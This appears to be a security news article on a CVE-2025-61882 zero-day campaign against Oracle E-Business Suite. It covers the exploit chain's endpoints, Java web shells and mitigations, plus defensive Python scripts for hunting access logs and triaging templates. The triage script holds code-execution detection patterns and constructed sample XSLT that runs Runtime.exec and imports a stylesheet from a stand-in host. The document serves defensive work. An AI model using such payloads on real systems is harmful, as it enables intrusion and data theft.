CrowdStrike has sounded the alarm on an ongoing mass exploitation campaign targeting Oracle E-Business Suite (EBS) applications through a zero-day vulnerability. The flaw, now tracked as CVE-2025-61882, enables unauthenticated remote code execution (RCE) and is already being used by threat actors to steal corporate data.
CrowdStrike attributes the exploitation with moderate confidence to GRACEFUL SPIDER, a financially motivated threat group also associated with Clop ransomware operations. The firm notes, “CrowdStrike Intelligence assesses with moderate confidence that GRACEFUL SPIDER is likely involved in this campaign but cannot rule out the possibility that multiple threat actors have exploited CVE-2025-61882.”
The campaign began around August 9, 2025, when the first exploitation attempts were observed. By late September, GRACEFUL SPIDER was directly contacting victims, claiming responsibility for intrusions.
“On September 29, 2025, GRACEFUL SPIDER emailed multiple organizations and claimed they had accessed and exfiltrated data from the victim’s Oracle EBS applications.”
CrowdStrike also highlighted chatter on Telegram channels linked to cybercriminal networks, where an individual shared a purported proof-of-concept (PoC) exploit for Oracle EBS and criticized GRACEFUL SPIDER's methods. Oracle later listed the hash of this same file in its CVE-2025-61882 advisory, which suggests the sample had already been used in the wild.
According to the report, “CrowdStrike is tracking a mass exploitation campaign almost certainly leveraging a novel zero-day vulnerability — now tracked as CVE-2025-61882 — targeting Oracle E-Business Suite (EBS) applications for the purposes of data exfiltration.”
CVE-2025-61882 is a remote code execution vulnerability in the internet-facing web tier of Oracle EBS that can be triggered without any authentication. The exploit chain observed by CrowdStrike begins with an HTTP POST request to /OA_HTML/SyncServlet, which performs the authentication-bypass step.
“The observed activity appears to begin with an HTTP POST request to /OA_HTML/SyncServlet, which initiates the authentication-bypass portion of a multi-step exploit chain. On at least one confirmed occasion, authentication bypass was related to an administrative account within EBS.”
With authentication bypassed, the attackers abuse Oracle XML Publisher's Template Manager, a legitimate EBS feature, to upload a malicious XSLT template that executes arbitrary code when the template is previewed.
“To achieve code execution, the adversary targeted Oracle’s XML Publisher Template Manager by issuing GET and POST requests to /OA_HTML/RF.jsp and /OA_HTML/OA.jsp to upload and execute a malicious XSLT template.”
When the template is processed, the Oracle web server opens outbound connections (observed on TCP port 443) to attacker-controlled infrastructure, which is how the web shell components used for persistence are retrieved.
CrowdStrike observed web shells implemented as custom Java components, FileUtils.java and Log4jConfigQpgsubFilter.java, the latter serving as a backdoor that could be invoked remotely. These Java classes were inserted into the application's servlet filter chain, which gives the backdoor memory-resident persistence: it executes whenever a request reaches the compromised application endpoints, without leaving a separate web shell file to be served.
“While analysis is ongoing, these files appear to set up a web shell, with FileUtils.java serving as the downloader and Log4jConfigQpgsubFilter.java serving as the backdoor.”
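The request sequence described above is something defenders can hunt for in the web tier's access logs. The following Python script is an added example, not code from CrowdStrike's report or from Oracle: it parses Apache / Oracle HTTP Server combined-format access log lines and flags any source IP that POSTs to /OA_HTML/SyncServlet and then reaches /OA_HTML/RF.jsp or /OA_HTML/OA.jsp within a correlation window. The log format, the 30-minute window and the sample entries are assumptions; the sample entries are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache / Oracle HTTP Server "combined" access log format (assumption: adjust
# the pattern if your OHS LogFormat differs). Only the fields we need are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

SYNC_SERVLET = "/OA_HTML/SyncServlet"                      # authentication-bypass entry point
TEMPLATE_MANAGER = {"/OA_HTML/RF.jsp", "/OA_HTML/OA.jsp"}  # XML Publisher Template Manager
WINDOW = timedelta(minutes=30)                              # assumed correlation window


def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],   # drop the query string
        "status": int(m.group("status")),
    }


def find_exploit_chains(lines, window=WINDOW):
    """Return one finding per source IP that POSTs to SyncServlet and then hits
    the Template Manager endpoints within `window` of that POST."""
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_ip[ev["ip"]].append(ev)

    findings = []
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        for sync in (e for e in events
                     if e["method"] == "POST" and e["path"] == SYNC_SERVLET):
            followups = [e for e in events
                         if e["path"] in TEMPLATE_MANAGER
                         and sync["ts"] <= e["ts"] <= sync["ts"] + window]
            if followups:
                findings.append({
                    "ip": ip,
                    "sync_post_at": sync["ts"].isoformat(),
                    "template_requests": [(e["method"], e["path"]) for e in followups],
                    # POSTs to the Template Manager correspond to the upload step
                    "upload_posts": sum(e["method"] == "POST" for e in followups),
                })
                break   # one finding per IP is enough to start an investigation
    return findings


# Constructed sample log lines, not entries from any real EBS deployment.
SAMPLE_LOG = """\
203.0.113.45 - - [10/Aug/2025:03:14:07 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.45 - - [10/Aug/2025:03:14:09 +0000] "GET /OA_HTML/RF.jsp?x=1 HTTP/1.1" 200 8841 "-" "Mozilla/5.0"
203.0.113.45 - - [10/Aug/2025:03:14:12 +0000] "POST /OA_HTML/OA.jsp HTTP/1.1" 200 1201 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Aug/2025:03:20:00 +0000] "GET /OA_HTML/RF.jsp HTTP/1.1" 200 8841 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Aug/2025:03:21:00 +0000] "GET /OA_HTML/SyncServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Aug/2025:05:00:00 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 512 "-" "curl/8.0"
192.0.2.10 - - [10/Aug/2025:08:00:00 +0000] "GET /OA_HTML/OA.jsp HTTP/1.1" 200 100 "-" "curl/8.0"
"""

if __name__ == "__main__":
    for finding in find_exploit_chains(SAMPLE_LOG.splitlines()):
        print(finding)
```

A SyncServlet POST on its own is not proof of exploitation, and a legitimate administrator reaches RF.jsp without ever touching SyncServlet, which is why the script keys on the ordered pair rather than on either endpoint in isolation. Widen the window if your logs show slower operators; in the sample, the second POST-then-GET pair three hours apart is deliberately left unflagged at the default window.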
The public leak of a PoC exploit on October 3, 2025 has significantly raised the threat level. CrowdStrike warns that the leak, combined with the release of Oracle's patch, could trigger a wave of opportunistic exploitation by ransomware affiliates and data brokers alike.
CrowdStrike emphasizes immediate patching and proactive network investigation for organizations using Oracle EBS, as exploitation continues to evolve. The report outlines a series of defensive measures:
- Apply Oracle’s CVE-2025-61882 update immediately to all EBS instances.
- Investigate outbound connections from the EBS web tier, which normally has little reason to initiate connections to the internet, and compare destinations against the published indicators of compromise.
- Review rows in the XDO_TEMPLATES_VL view for templates with unfamiliar names, recent creation dates, or URL references.
- Check for unexpected sessions under user ID 0 (SYSADMIN) or user ID 6 (GUEST); the observed authentication bypass landed in an administrative account.
- Consider removing direct internet exposure of EBS instances until they are patched.
- Deploy a web application firewall (WAF) to filter malicious requests.
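For the template review item, the following Python triage is an added example, not CrowdStrike's or Oracle's code. It takes rows exported from XDO_TEMPLATES_VL together with the stored stylesheet body (the keys template_code, template_name, created_by, creation_date and xsl are assumptions to map onto your own export) and flags templates whose XSLT declares Xalan/Java extension namespaces, calls process-execution functions, or pulls in remote stylesheets or documents, as well as templates created under SYSADMIN (user ID 0) or GUEST (user ID 6) on or after the campaign's August 9, 2025 start. The content patterns are generic XSLT-to-Java code-execution constructs, not indicators taken from the report, and the sample rows are constructed.

```python
import re
from datetime import datetime

CAMPAIGN_START = datetime(2025, 8, 9)   # first exploitation attempts observed, per the report
PRIVILEGED_USER_IDS = {0, 6}            # SYSADMIN and GUEST in Oracle EBS

# Generic XSLT constructs that let a stylesheet execute Java or fetch remote
# content. Assumption: these are textbook XSLT-engine features, not indicators
# published in the report; tune them to the XSLT processor your EBS release uses.
SUSPICIOUS_PATTERNS = [
    ("xalan-java-extension",
     re.compile(r'xmlns:[\w.-]+\s*=\s*["\']http://xml\.apache\.org/(?:xalan|xslt)/java', re.I)),
    ("java-namespace-uri",
     re.compile(r'xmlns:[\w.-]+\s*=\s*["\']java:', re.I)),
    ("process-execution",
     re.compile(r'\b(?:getRuntime|ProcessBuilder|exec)\s*\(')),
    ("remote-include",
     re.compile(r'<xsl:(?:include|import)\b[^>]*href\s*=\s*["\']https?://', re.I)),
    ("remote-document",
     re.compile(r'\bdocument\s*\(\s*["\']https?://', re.I)),
]


def triage_template(row):
    """Return the list of reasons a template deserves a closer look ([] if none).

    row keys (assumed mapping from an XDO_TEMPLATES_VL / stylesheet export):
      template_code, template_name, created_by (EBS user_id, int),
      creation_date (datetime), xsl (stylesheet text, may be empty).
    """
    content_hits = [label for label, pat in SUSPICIOUS_PATTERNS
                    if pat.search(row.get("xsl") or "")]
    meta_hits = []
    if row["created_by"] in PRIVILEGED_USER_IDS:
        meta_hits.append(f"created_by user_id {row['created_by']}")
    if row["creation_date"] >= CAMPAIGN_START:
        meta_hits.append("created on/after campaign start")
    # Dangerous content is reportable on its own. Metadata alone is reportable only
    # when a privileged creator and the campaign window coincide; otherwise every
    # legitimately authored template since August would be noise.
    if content_hits or len(meta_hits) == 2:
        return content_hits + meta_hits
    return []


def triage_templates(rows):
    """Map template_code -> reasons for every row that triage_template flags."""
    flagged = {}
    for row in rows:
        reasons = triage_template(row)
        if reasons:
            flagged[row["template_code"]] = reasons
    return flagged


BENIGN_XSL = ('<xsl:stylesheet version="1.0" '
              'xmlns:xsl="http://www.w3.org/1999/XSL/Transform" '
              'xmlns:fo="http://www.w3.org/1999/XSL/Format">'
              '<xsl:template match="/"><fo:block>Invoice</fo:block></xsl:template>'
              '</xsl:stylesheet>')

# Constructed sample rows, not data from any real EBS instance.
SAMPLE_ROWS = [
    {"template_code": "XX_INVOICE_PRINT", "template_name": "Invoice Print",
     "created_by": 1234, "creation_date": datetime(2024, 3, 1), "xsl": BENIGN_XSL},
    {"template_code": "TMP_UPLOAD", "template_name": "tmp",
     "created_by": 0, "creation_date": datetime(2025, 8, 10),
     "xsl": ('<xsl:stylesheet version="1.0" '
             'xmlns:xsl="http://www.w3.org/1999/XSL/Transform" '
             'xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">'
             '<xsl:template match="/">'
             '<xsl:value-of select="rt:exec(rt:getRuntime(), \'id\')"/>'
             '</xsl:template></xsl:stylesheet>')},
    {"template_code": "XX_REMOTE_HDR", "template_name": "Header",
     "created_by": 1234, "creation_date": datetime(2025, 9, 2),
     "xsl": ('<xsl:stylesheet version="1.0" '
             'xmlns:xsl="http://www.w3.org/1999/XSL/Transform">'
             '<xsl:import href="https://203.0.113.9/hdr.xsl"/>'
             '</xsl:stylesheet>')},
    {"template_code": "XX_OLD_ADMIN", "template_name": "Old admin template",
     "created_by": 0, "creation_date": datetime(2024, 1, 15), "xsl": BENIGN_XSL},
]

if __name__ == "__main__":
    for code, reasons in triage_templates(SAMPLE_ROWS).items():
        print(f"{code}: {', '.join(reasons)}")
```

Run it against a full export rather than a filtered one: a template that looks innocuous by name can still carry a Java extension namespace, and a template authored under SYSADMIN before the campaign started (the fourth sample row) is deliberately not flagged so that long-standing administrative templates do not bury the real hits.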